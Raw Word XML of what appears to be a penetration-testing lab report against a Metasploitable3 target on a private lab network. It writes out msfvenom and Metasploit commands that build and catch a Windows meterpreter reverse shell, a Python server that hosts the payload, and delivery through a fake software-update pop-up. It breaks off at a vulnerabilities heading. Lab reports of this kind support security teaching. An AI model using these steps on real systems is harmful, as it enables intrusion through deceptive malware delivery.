        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007D03AE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>102</w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBDE22F" w14:textId="1019FC5C" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable3</w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Target): IP Address: 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="007D03AE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007D03AE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>101</w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9B0B6E" w14:textId="77777777" w:rsidR="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Connectivity was verified using the ping command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542CD598" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="002866C8" w:rsidRDefault="00325596" w:rsidP="002866C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002866C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Payload Creation with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002866C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MSFvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22E38CFB" w14:textId="2FEDCD88" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">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25596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Command executed: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.</w:t>
      </w:r>
      <w:r w:rsidR="006B6068">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>56.102</w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT=4444 -f exe -o payload.exe  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB9FDF0" w14:textId="486EC539" w:rsidR="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">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25596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Generated a reverse TCP payload named payload.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B587836" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="002866C8" w:rsidRDefault="00325596" w:rsidP="002866C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002866C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 3: Hosting Payload on Python HTTP Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0885C8" w14:textId="76036841" w:rsidR="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">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25596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Command executed:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
      <w:r w:rsidR="007B1D10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477B1E9C" w14:textId="1642D213" w:rsidR="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">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25596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Hosted the payload for delivery via the attacker's machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3611B88C" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">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325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Step 4: Configuring Metasploit Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620ACC3B" w14:textId="2223E1FA" w:rsidR="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">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25596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Commands executed within Metasploit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/multi/handler  </w:t>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sidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325596">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sidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>set LHOST 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="002866C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002866C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>102</w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">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sidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">set LPORT 4444  </w:t>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sidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D97249E" w14:textId="07D8B13F" w:rsidR="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">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25596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Successfully set up the listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB4C472" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">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325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Step 5: Payload Delivery and Reverse Shell Establishment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE12820" w14:textId="4B57A2D0" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="002129D9">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25596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Delivered the payload </w:t>
      </w:r>
      <w:r w:rsidR="00F436C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r w:rsidR="002129D9" w:rsidRPr="002129D9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F436C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="002129D9" w:rsidRPr="002129D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">edirecting </w:t>
      </w:r>
      <w:r w:rsidR="00F436C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="002129D9" w:rsidRPr="002129D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">raffic </w:t>
      </w:r>
      <w:r w:rsidR="00F436C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="002129D9" w:rsidRPr="002129D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">sing a </w:t>
      </w:r>
      <w:r w:rsidR="00F436C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="002129D9" w:rsidRPr="002129D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ake </w:t>
      </w:r>
      <w:r w:rsidR="00F436C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="002129D9" w:rsidRPr="002129D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">oftware </w:t>
      </w:r>
      <w:r w:rsidR="00F436C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="002129D9" w:rsidRPr="002129D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">pdate </w:t>
      </w:r>
      <w:r w:rsidR="00F436C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="002129D9" w:rsidRPr="002129D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>op-up</w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CD1DE1" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">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25596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Once executed on the target machine, Meterpreter established a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15001ACE" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00D33140" w:rsidRDefault="00325596" w:rsidP="00D33140">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:num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D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Identified Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762E1878" w14:textId="77777777" w:rsidR="00325596" w:rsidRDefault="00325596" w:rsidP="0032559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25596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Vulnerability 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
